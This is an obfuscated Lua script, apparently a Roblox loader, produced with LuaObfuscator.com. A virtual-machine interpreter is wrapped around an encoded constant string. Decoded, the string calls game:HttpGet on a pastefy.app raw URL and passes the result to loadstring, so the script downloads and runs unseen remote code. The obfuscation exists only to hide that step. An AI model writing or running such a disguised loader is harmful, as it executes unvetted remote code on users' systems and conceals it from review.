--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v83=v2(v0(v30,16));if v19 then local v90=0;local v91;while true do if (v90==1) then return v91;end if (v90==0) then v91=v5(v83,v19);v19=nil;v90=1;end end else return v83;end end end);local function v20(v31,v32,v33) if v33 then local v84=(v31/((5 -3)^(v32-1)))%((5 -3)^(((v33-(1 -0)) -(v32-1)) + (2 -1))) ;return v84-(v84%(620 -(555 + 64))) ;else local v85=931 -(857 + (951 -(282 + 595))) ;local v86;while true do if (v85==0) then v86=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v86 + v86))>=v86) and (1 + 0)) or (0 + (1637 -(1523 + 114))) ;end end end end local function v21() local v34=(0 -0) + 0 ;local v35;while true do if (v34==1) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (1066 -((185 -(32 + 85)) + 997)) ;v34=1271 -(226 + 1044) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + 2 + 0 ;return (v37 * (1213 -(892 + 65))) + v36 ;end local function v23() local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==(1 -0)) then return (v42 * (30800116 -14022900)) + (v41 * (65886 -(87 + 263))) + (v40 * (436 -(67 + 84 + 29))) + v39 ;end if (v38==0) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 );v18=v18 + 3 + 1 ;v38=2 -1 ;end end end local function v24() local v43=0 -0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==3) then if (v48==(952 -(802 + 150))) then if (v47==(0 -0)) then return v49 * (0 -0) ;else local v102=0 + 0 ;while true do if ((997 -((1687 -(201 + 571)) + 82))==v102) then v48=2 -(1 + 0) ;v46=0 + 0 ;break;end end end elseif (v48==(2691 -644)) then return ((v47==(1187 -(1069 + 118))) and (v49 * ((2 -1)/(0 -0)))) or (v49 * NaN) ;end return v8(v49,v48-(178 + 845) ) * (v46 + (v47/((3 -1)^52))) ;end if (v43==(1 + (1138 -(116 + 1022)))) then v46=(3297 -2505) -(368 + 423) ;v47=(v20(v45,(10 -7) -2 ,38 -(10 + 8) ) * ((7 -5)^(474 -(416 + 26)))) + v44 ;v43=861 -(814 + 45) ;end if ((0 -0)==v43) then v44=v23();v45=v23();v43=1;end if ((1 + 1)==v43) then v48=v20(v45,36 -15 ,469 -((357 -212) + 293) );v49=((v20(v45,462 -(44 + 21 + 365) )==(1487 -(998 + 173 + 315))) and  -1) or (1 + 0) ;v43=3 + 0 ;end end end local function v25(v50) local v51=885 -(261 + 624) ;local v52;local v53;while true do if (v51==(1 -0)) then v52=v3(v16,v18,(v18 + v50) -1 );v18=v18 + v50 ;v51=1082 -(1020 + (1973 -(1789 + 124))) ;end if (v51==(1425 -(630 + 793))) then v53={};for v92=3 -(768 -(745 + 21)) , #v52 do v53[v92]=v2(v1(v3(v52,v92,v92)));end v51=2 + 1 ;end if ((14 -11)==v51) then return v6(v53);end if (v51==(0 + 0)) then v52=nil;if  not v50 then v50=v23();if (v50==(0 -0)) then return "";end end v51=1748 -((2091 -1331) + 987) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return 0;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();local v61=(function() return;end)();while true do local v68=(function() return 0;end)();while true do if ((0 -0)==v68) then if (v54==(1667 -(970 + 695))) then v61=(function() return {};end)();for v103= #"<",v60 do local v104=(function() return 0 -0 ;end)();local v105=(function() return;end)();local v106=(function() return;end)();while true do if (v104~=1) then else if (v105== #"|") then v106=(function() return v21()~=(1990 -(582 + 1408)) ;end)();elseif (v105==(6 -4)) then v106=(function() return v24();end)();elseif (v105== #"xxx") then v106=(function() return v25();end)();end v61[v103]=(function() return v106;end)();break;end if (v104==0) then local v125=(function() return 0 -0 ;end)();while true do if (v125==0) then v105=(function() return v21();end)();v106=(function() return nil;end)();v125=(function() return 1;end)();end if (v125==(3 -2)) then v104=(function() return 1825 -(1195 + 629) ;end)();break;end end end end end v59[ #"gha"]=(function() return v21();end)();v54=(function() return 3;end)();end if (v54==0) then local v99=(function() return 0 -0 ;end)();local v100=(function() return;end)();while true do if (v99==0) then v100=(function() return 241 -(187 + 54) ;end)();while true do if (1~=v100) then else v57=(function() return {};end)();v54=(function() return 781 -(162 + 618) ;end)();break;end if (0~=v100) then else local v158=(function() return 0 + 0 ;end)();while true do if (v158==(1 + 0)) then v100=(function() return 1;end)();break;end if (v158==0) then v55=(function() return function(v175,v176,v177) local v178=(function() return 0 -0 ;end)();local v179=(function() return;end)();while true do if (v178==0) then v179=(function() return 0 -0 ;end)();while true do if (v179~=(0 + 0)) then else local v184=(function() return 1636 -(1373 + 263) ;end)();while true do if (v184==(1000 -(451 + 549))) then v175[v176-#"]" ]=(function() return v177();end)();return v175,v176,v177;end end end end break;end end end;end)();v56=(function() return {};end)();v158=(function() return 1 + 0 ;end)();end end end end break;end end end v68=(function() return 1 -0 ;end)();end if (v68==(1 -0)) then if (v54~=3) then else for v107= #":",v23() do local v108=(function() return 1384 -(746 + 638) ;end)();local v109=(function() return;end)();while true do if (v108~=0) then else v109=(function() return v21();end)();if (v20(v109, #"<", #":")~=(0 + 0)) then else local v159=(function() return 0 -0 ;end)();local v160=(function() return;end)();local v161=(function() return;end)();local v162=(function() return;end)();while true do if (v159~=(341 -(218 + 123))) then else local v170=(function() return 0;end)();local v171=(function() return;end)();while true do if (0==v170) then v171=(function() return 0;end)();while true do if (v171==(1582 -(1535 + 46))) then v159=(function() return 1;end)();break;end if (v171~=(0 + 0)) then else v160=(function() return v20(v109,1 + 1 , #"19(");end)();v161=(function() return v20(v109, #"asd1",566 -(306 + 254) );end)();v171=(function() return 1;end)();end end break;end end end if (v159~=(1 + 0)) then else local v172=(function() return 0;end)();local v173=(function() return;end)();while true do if (v172~=0) then else v173=(function() return 0 -0 ;end)();while true do if (v173==1) then v159=(function() return 2;end)();break;end if ((1467 -(899 + 568))==v173) then local v183=(function() return 0;end)();while true do if ((0 + 0)==v183) then v162=(function() return {v22(),v22(),nil,nil};end)();if (v160==0) then local v186=(function() return 0 -0 ;end)();local v187=(function() return;end)();while true do if (0~=v186) then else v187=(function() return 603 -(268 + 335) ;end)();while true do if ((290 -(60 + 230))~=v187) then else v162[ #"nil"]=(function() return v22();end)();v162[ #"0313"]=(function() return v22();end)();break;end end break;end end elseif (v160== #">") then v162[ #"asd"]=(function() return v23();end)();elseif (v160==(574 -(426 + 146))) then v162[ #"xxx"]=(function() return v23() -(2^(2 + 14)) ;end)();elseif (v160~= #"nil") then else local v192=(function() return 0;end)();local v193=(function() return;end)();while true do if (0==v192) then v193=(function() return 1456 -(282 + 1174) ;end)();while true do if (v193~=(811 -(569 + 242))) then else v162[ #"91("]=(function() return v23() -(2^16) ;end)();v162[ #".dev"]=(function() return v22();end)();break;end end break;end end end v183=(function() return 2 -1 ;end)();end if (v183==1) then v173=(function() return 1;end)();break;end end end end break;end end end if (v159==(1 + 2)) then if (v20(v161, #"-19", #"gha")== #" ") then v162[ #"xnxx"]=(function() return v61[v162[ #"asd1"]];end)();end v56[v107]=(function() return v162;end)();break;end if ((1026 -(706 + 318))==v159) then if (v20(v161, #"]", #"~")== #"~") then v162[2]=(function() return v61[v162[1253 -(721 + 530) ]];end)();end if (v20(v161,1273 -(945 + 326) ,2)== #"{") then v162[ #"nil"]=(function() return v61[v162[ #"-19"]];end)();end v159=(function() return 7 -4 ;end)();end end end break;end end end for v110= #"[",v23() do v57,v110,v28=(function() return v55(v57,v110,v28);end)();end return v59;end if (v54==(1 + 0)) then local v101=(function() return 700 -(271 + 429) ;end)();while true do if ((1 + 0)==v101) then v60=(function() return v23();end)();v54=(function() return 2;end)();break;end if (v101==0) then v58=(function() return {};end)();v59=(function() return {v56,v57,nil,v58};end)();v101=(function() return 1;end)();end end end break;end end end end local function v29(v62,v63,v64) local v65=v62[1501 -(1408 + 92) ];local v66=v62[2];local v67=v62[3];return function(...) local v69=v65;local v70=v66;local v71=v67;local v72=v27;local v73=1087 -(461 + 625) ;local v74= -(1289 -(993 + 295));local v75={};local v76={...};local v77=v12("#",...) -(1 + 0) ;local v78={};local v79={};for v87=1171 -(418 + 753) ,v77 do if ((3249>953) and (v87>=v71)) then v75[v87-v71 ]=v76[v87 + 1 + 0 ];else v79[v87]=v76[v87 + 1 + 0 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1 + 0 ];if (v82<=3) then if (v82<=(1 + 0)) then if (v82==(529 -(406 + 123))) then v79[v81[2]]=v64[v81[1772 -(381 + 1368 + (997 -(553 + 424))) ]];else v79[v81[1 + (1 -0) ]]();end elseif ((v82==(1324 -(1249 + 73))) or (3273>4573)) then v79[v81[1 + 1 ]]=v81[(1012 + 136) -(466 + 679) ];else local v115=0 -0 ;local v116;while true do if ((v115==0) or (3151<1284)) then v116=v81[5 -3 ];v79[v116]=v79[v116](v13(v79,v116 + (1901 -(106 + 1794)) ,v74));break;end end end elseif ((v82<=(2 + 3)) or (1850==1529)) then if ((821<2123) and (v82==(2 + 2))) then v79[v81[5 -3 ]]={};else do return;end end elseif (v82<=(16 -10)) then local v118=114 -(4 + 110) ;local v119;local v120;local v121;local v122;local v123;while true do if (v118==0) then v119=nil;v120,v121=nil;v122=nil;v123=nil;v79[v81[2]]={};v73=v73 + (585 -(57 + 527)) ;v118=1428 -(41 + 0 + 1386) ;end if (v118==(108 -(17 + 86))) then v79[v123]=v79[v123](v13(v79,v123 + 1 + 0 ,v74));v73=v73 + (1 -0) ;v81=v69[v73];v79[v81[5 -3 ]]();v73=v73 + 1 ;v81=v69[v73];v118=172 -(122 + 44) ;end if ((902<2325) and (v118==(6 -2))) then v74=(v121 + v123) -1 ;v119=0 -(0 + 0) ;for v163=v123,v74 do v119=v119 + 1 + 0 ;v79[v163]=v120[v119];end v73=v73 + 1 ;v81=v69[v73];v123=v81[1 + 0 + 1 ];v118=10 -5 ;end if (v118==((39 + 29) -(30 + (75 -40)))) then v81=v69[v73];v79[v81[(5 -3) + (0 -0) ]]=v81[3];v73=v73 + (1258 -(1043 + 214)) ;v81=v69[v73];v123=v81[2];v120,v121=v72(v79[v123](v13(v79,v123 + 1 ,v81[11 -(3 + 5) ])));v118=1216 -((1560 -1237) + (1642 -(239 + 514))) ;end if (v118==(2 -1)) then v81=v69[v73];v79[v81[582 -(361 + 219) ]]=v64[v81[323 -(53 + 94 + 173) ]];v73=v73 + 1 + 0 ;v81=v69[v73];v79[v81[415 -(15 + (1727 -(797 + 532))) ]]=v64[v81[985 -(18 + 964) ]];v73=v73 + 1 ;v118=7 -5 ;end if (v118==(4 + 2)) then do return;end break;end if (v118==(2 + 0 + 0)) then v81=v69[v73];v123=v81[852 -(20 + 281 + 549) ];v122=v79[v81[3]];v79[v123 + 1 ]=v122;v79[v123]=v122[v81[4 + 0 ]];v73=v73 + (127 -(116 + 10)) ;v118=1 + 2 ;end end elseif (v82==(745 -(542 + (460 -264)))) then local v126=v81[3 -1 ];local v127=v79[v81[1 + 2 ]];v79[v126 + 1 ]=v127;v79[v126]=v127[v81[3 + 1 ]];else local v131=0 + 0 ;local v132;local v133;local v134;local v135;while true do if (v131==1) then v74=(v134 + v132) -((1204 -(373 + 829)) -1) ;v135=0 -0 ;v131=2;end if ((858<=2962) and ((1551 -(1126 + 425))==v131)) then v132=v81[407 -(118 + 287) ];v133,v134=v72(v79[v132](v13(v79,v132 + (3 -2) ,v81[1124 -(118 + 1003) ])));v131=2 -1 ;end if (v131==(379 -(142 + 235))) then for v167=v132,v74 do v135=v135 + 1 ;v79[v167]=v133[v135];end break;end end end v73=v73 + (4 -3) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403203Q00682Q7470733A2Q2F706173746566792E612Q702F342Q414C767563752F72617700094Q00067Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
